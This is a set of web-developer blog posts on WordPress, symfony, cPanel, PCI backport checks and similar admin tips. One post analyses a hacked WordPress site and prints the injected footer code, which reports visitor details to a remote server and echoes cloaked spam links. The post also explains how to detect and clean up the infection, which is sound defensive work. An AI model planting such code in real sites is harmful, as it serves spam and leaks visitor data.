Thesis 1.8.4 Upgrade – style.css

I was recently upgrading a Thesis-based site from Thesis 1.8 to 1.8.4 and noticed that every time I activated the theme, the site’s style was completely wrong. I checked the HTML generated by both versions, and 1.8 was requesting the Thesis style.css but 1.8.4 was not. Upon looking at the code, I found that in 1.8.4 when the design options are saved, Thesis copies the contents of style.css to custom/layout.css.

Solution: once you have activated Thesis 1.8.4, simply go to the design options panel and click the big-ass save button. This runs the Thesis code that copies the style.css rules into custom/layout.css, and your design should look as it did before.
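If you want to confirm the copy happened, you can compare the two files from the shell. The theme directory name below is an assumption – adjust it to whatever your Thesis folder is actually called:

$ cd wp-content/themes/thesis_184        # adjust to your Thesis directory name
$ diff style.css custom/layout.css       # after saving, layout.css should now include the rules from style.css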

Converting DOS to UNIX newlines

Annoying as it may be, Windows and some FTP clients insert “carriage return” characters into text files. This is commonly referred to as “DOS” mode – you’ll know you’re editing a DOS-mode file if your editor tells you so, or (as I found this morning) if git tells you. I downloaded a bunch of files I had passed to a client, and git told me they had all been changed – they simply had carriage return (\r or ^M) characters inserted. Meh.

You can convert files with the fromdos command, which is located in the tofrodos package. Doing this recursively is pretty easy as well:


ewiltshi@davinci$ find . -type f | xargs fromdos

The above pattern is very useful – find . -type f just finds all files in the current directory and all subdirectories. The output then gets piped to xargs fromdos, which runs the fromdos command on each of the found files. If you only wanted to run it on .php files, you could just change it up like so:


ewiltshi@davinci$ find . -type f -name "*.php" | xargs fromdos
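One caveat with this pattern: plain xargs will choke on filenames containing spaces. If that’s a possibility, the usual fix is to have find emit NUL-terminated names and tell xargs to expect them:

ewiltshi@davinci$ find . -type f -name "*.php" -print0 | xargs -0 fromdos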

Google Instant with FireWatir

I’ve been playing around with FireWatir, which allows you to write Ruby scripts that control a Firefox web browser. This has obvious white hat uses, such as automated testing of sites that use JavaScript. It also has black hat uses for things like automated account creation and article directory submission.

The most basic example is searching Google for something, and the code looks like this:


require 'rubygems'
require 'firewatir'

ff = FireWatir::Firefox.new                  # launch a new Firefox instance
ff.goto('http://www.google.com/ncr')         # /ncr avoids country-specific redirects
ff.text_field(:name => 'q').set('yoda')      # type the search term
ff.button(:name, 'btnG').click               # click the search button

The problem is Google Instant – after FireWatir types the first character, Google Instant executes some AJAX which interferes with FireWatir, and I found only the first character would get typed. If you’re not running Firefox in “porn mode” you can disable Instant and the setting will be saved in a cookie; if you have Firefox configured not to save cookies, this is a problem. Here’s a solution that is somewhat of a kludge, but it works:


ff = FireWatir::Firefox.new
ff.goto('http://www.google.com/ncr')
ff.text_field(:name => 'q').set('y')         # type just the first character
sleep 0.3                                    # give Instant's AJAX time to fire
ff.text_field(:name => 'q').set('yoda')      # now set the full search term
ff.button(:name, 'btnG').click

The difference here is that we set only the first character in the text field, then pause the script to give Instant time to update before proceeding with the rest of the code.

WordPress Twitter API Plugins not authenticating

A friend asked me to investigate why he was unable to use any Twitter plugins with his blog, but only on one specific server. After Googling around a little, I saw solutions that ranged from disabling PHP’s OAuth module to updating the server time. It turns out that none of these fixed the problem – the issue was a lack of SSL support in cURL.

His server runs cPanel, and although cURL support was enabled, the Twitter API calls all use HTTPS. The fix was to use EasyApache and check the box next to curlssl as well as curl. A recompile of Apache and PHP, and boom – the plugin started working. It would be really great if the plugin mentioned the lack of SSL support in cURL rather than dying with a generic “Couldn’t authenticate” message; there was nothing in the PHP error log.
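If you suspect the same issue, a quick way to check whether PHP’s cURL extension was built with SSL support is to dump curl_version() from the shell (the exact keys in the output vary a little between PHP versions):

$ php -r 'print_r(curl_version());' | grep -i ssl

An empty ssl_version entry (or no mention of OpenSSL at all) suggests cURL was compiled without SSL, which matches the symptom above.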

symfony caching – cross-application cache clearing

I’m writing a webapp that has an api application and a frontend application. The frontend supports caching, since it provides RSS feeds that might be read quite frequently and don’t change often; the current cache timeout is set to 12 hours. The API, however, allows the user to change aspects of an RSS feed so much that its contents could be totally different, and 12 hours is too long for the user to wait for the cache to expire.

What I needed to do was clear the frontend cache, but from within the API application. I found this post that described how to do it in symfony 1.2, and it works just great in 1.4! Here’s the post: clearing symfony cache for another application.

Here’s the code snippet that I ended up using:

// Save any changes, if any were made, and clear the frontend RSS cache for
// this feed.
if ($changes == true)
{
    $wc->save();

    // Clear the cache, if it's turned on.
    sfContext::switchTo('frontend'); // switch to the application whose cache you wish to clear
    sfContext::getInstance()->getViewCacheManager()->remove('static/rss?id=' . $wc->getId());
    sfContext::switchTo('api');      // switch back to the application you started from
}

Link building exploit that only Google can see

I was called by a client today who had looked at her site in Google’s cache and was shocked to see spam links for penis pills. When she viewed her site, however, there were no links to be seen. Thinking the hosting provider had fixed the issue, I looked at the most recently cached copy, which was only a few hours old, and saw that the links were still there. The database was clean, and there were no modified files in the document root or theme.

I assumed that the exploit was still live but wasn’t showing anything to my browser, so it might be using user-agent cloaking. I tried switching my user-agent to Googlebot’s, and still no dice. Then I decided to grep the entire codebase for “USER_AGENT” and see if anything hit. Lo and behold:

$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot

Huh. That seemed odd, so I investigated further and found this:


function get_footer( $name = null ) {
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
    $stCurlHandle = NULL;
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
            $stCurlHandle = curl_init(URL_REMOVED?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']));
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics
            $stCurlHandle = curl_init(URL_REMOVED?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']));
    }
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = curl_exec($stCurlHandle);
    curl_close($stCurlHandle);
    echo $sResult; // Statistic code end

I compared this to a clean WordPress install, and none of the “statistics” code was there. It’s pretty clear this is injected code, and it’s checking both the user-agent string AND the source IP address, which is why I couldn’t see the links even when I set my user-agent string to Googlebot’s. Smart. And since the script “calls home” to check the IP, not only can the attacker change the cloaked IP blocks easily (without having to re-upload a script), but they also have a record of which sites have been successfully attacked.

The next question was how the injected code was introduced. I ran a UNIX find query and found yet another file that contained the above; it also contained code to inject itself into PHP-Nuke, vBulletin, and Joomla in addition to WordPress, as well as a cleanup function, which this particular attacker did not invoke. On my install the file was at ./wp-includes/js/tinymce/plugins/plugin.php.

After checking the FTP logs, I discovered that someone at a Belize-based IP address had uploaded the above file and executed the script to inject the code. Cleanup was a matter of changing the FTP password, checking for extra WordPress accounts, and reinstalling WordPress from a fresh copy. I’m not certain how the attacker got my client’s FTP password, so I asked her to scan her PC and all of her current employees’ PCs, and I gave her the new password over the phone rather than by email.

If you’ve looked in Google’s cache and are seeing pharmaceutical links in the footer (that you didn’t put there!), or are noticing that Webmaster Tools is saying your site is about viagra, you may have the above problem. You can verify by looking for the above code snippet. If you are a victim, change your hosting credentials, scan your PC, and install from a fresh copy of WordPress.
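One quick way to check is to grep your document root for a distinctive string from the injected code – for example, the misspelled comment shown above:

$ grep -rl "google serch bot" /path/to/your/docroot

Any files it lists are worth inspecting.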

Must-have plugins for any WordPress install

One of the things that makes WordPress so great is the fact that you can extend it, without touching the core, through the use of plugins. Here is the list of must-have plugins that I put on every blog I deploy, and why:

  • All In One SEO Pack – allows you to set custom titles and meta descriptions very easily.
  • Sociable – adds social bookmarking icons to your posts.
  • NextGEN Gallery – this is an amazing image plugin. Not only does it allow upload of zip archives to create galleries, but the templates to display galleries are easily customized.
  • Viper’s Video Quicktags – for sites that require video embed tags, I like this plugin the best. The shortcodes are simple to use and automate.
  • Google XML Sitemaps Generator – XML sitemap and robots.txt generator. This is a definite must-have that should be installed before a site even goes live.
  • Redirection Plugin – used for moving sites from one domain to another. Allows you to set up 301 redirects from your old posts to your new ones quite easily, which gets your new site indexed more quickly. Be warned that this plugin can cause interference with other plugins. If your site starts acting strangely, I recommend disabling the redirection plugin and adding static 301s to your .htaccess instead.
  • Google Analytics – if you’re using Google Analytics, I like this plugin.

As a final note, this method for generating SEO-friendly permalinks is good, and I’ve used it on several sites.

symfony and cPanel “couldn’t locate driver named mysql”

I was experiencing this earlier today on a cPanel server to which I had deployed a symfony application. The solution was to install the PDO_MYSQL PECL module. Here’s how you do it:

  1. Log in as root to your cPanel install
  2. Under the Software menu on the left, click “Module Installers”
  3. Click Manage next to the PHP PECL item
  4. Search for “PDO” using the search
  5. Click “Install” in the PDO_MYSQL row
  6. Clear your symfony cache, and away you go!
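To confirm the driver is actually available, you can check PHP’s loaded modules from the shell (the exact module names can vary slightly between PHP builds):

$ php -m | grep -i pdo     # you should see PDO and pdo_mysql listed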

PCI Compliance And Back Ports

I was recently hired to run a PCI compliance scan on a CentOS 5 box and complete the remedial work to bring it up to standard. The tool I was using to do the scanning was pretty good, but like all scanning tools it plays “the numbers game”: it simply looks at the versions of certain services and flags them if those versions are known to be vulnerable. In my case, Apache and PHP were causing the most red flags. There were some XSS (cross-site scripting) vulnerabilities addressed in Apache 2.2.8, and my server header was showing 2.2.3. PHP was the same story, with several DoS and code execution vulnerabilities fixed in 5.2.7, and I was apparently running 5.2.6. Obviously vulnerable, right? No and yes. I’ll explain why that is, and how you can tell what you’re really vulnerable to.

Linux distributions such as Red Hat (RHEL, Fedora, CentOS) sometimes rely on “backports”: patching the existing version of a service to fix the hole without bumping the version number. This means a lot of false positives on the scan, which you can clear up with the rpm tool, grep, and a web browser. Let’s start with Apache – the scanner says I am running 2.2.3, which is supposedly vulnerable to some cross-site scripting (XSS) attacks, and being vulnerable to XSS is a PCI compliance fail. I checked the upstream changelog for Apache 2.2 and saw that CVE-2008-2939 was fixed in version 2.2.10. We then run:

[root@steve ~]# rpm -q --changelog httpd | grep CVE-2008-2939
- add security fixes for CVE-2008-2364, CVE-2008-2939 (#468840)

This shows that someone at Red Hat applied the patch to fix this vulnerability, even though the version number wasn’t updated – a clear false positive. If you don’t find the CVE number listed in the changelog, pipe the output to less and look for anything mentioning the affected module, or an upgrade to a version that includes the fix. For example, in my case PHP 5.2.7 fixed a bunch of security problems present in prior versions, some of which are a PCI fail.
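In other words, something like this, which you can then search through with less’s / command:

[root@steve ~]# rpm -q --changelog php | less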

When I looked through the PHP RPM changelog, the most recent entry I found was the update to 5.2.6, with no mention of 5.2.7 or patches for the issues it addressed. Checking the upstream PHP changelog showed a lot of security fixes in 5.2.7. I ended up using a PHP 5.2.8 RPM from atomicrocketturtle.com which included the fixes. Using a third-party repository isn’t ideal, but given the choice between that, building from source, or applying patches to a source RPM, I picked the third-party repository.

A few final thoughts:

  • You may find it easier to disable a module or service than to patch it. If it isn’t required, disable it – that’s good security practice anyway.
  • For services that are only required locally, such as database and mail services, bind them to the localhost interface and firewall them (see the sketch after this list).
  • Don’t put all your faith in automated scanners – they are a tool, not an absolute solution. You will need to go through the results yourself, or hire someone to help you.
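As a rough sketch of that second point, here’s one way to firewall MySQL so it only answers on localhost. The port and rules below are assumptions – adapt them to your own setup, and ideally also set bind-address = 127.0.0.1 in my.cnf:

[root@steve ~]# iptables -A INPUT -p tcp --dport 3306 -s 127.0.0.1 -j ACCEPT   # allow local connections to MySQL
[root@steve ~]# iptables -A INPUT -p tcp --dport 3306 -j DROP                  # drop everything else
[root@steve ~]# service iptables save                                          # persist the rules on CentOS 5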

If you’re looking to hire someone to set up a PCI compliant LAMP stack or audit an existing one, please contact me for an estimate.

External DNS at 1and1

You may have your DNS hosted in one place (say, DNS Made Easy) but host your content at 1and1.com; 1and1 allows this without transferring the domain to them. The problem is that they appear not to set the DirectoryIndex directive for hosts using external DNS. This can be overcome by creating (or adding to) the .htaccess file in your site’s root directory:

DirectoryIndex index.php

That’ll work for WordPress and most other PHP-based sites. You can always change it to index.html if that’s what your site’s index page is.
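For example, assuming you’re in the site’s root directory, you could append the directive from the shell – listing index.html as a fallback here is just an assumption, so put whatever your real index page is first:

$ echo "DirectoryIndex index.php index.html" >> .htaccess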
